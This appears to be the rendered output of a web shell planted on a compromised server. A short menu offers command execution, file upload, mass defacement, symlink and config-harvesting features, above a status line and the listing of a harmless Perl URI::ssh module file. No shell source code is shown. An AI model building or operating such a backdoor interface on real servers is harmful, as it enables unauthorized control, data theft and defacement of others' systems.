OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /libx32/../share/perl5/URI/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
package URI::ssh; use strict; use warnings; our $VERSION = '1.76'; use parent 'URI::_login'; # ssh://[USER@]HOST[:PORT]/SRC sub default_port { 22 } sub secure { 1 } 1;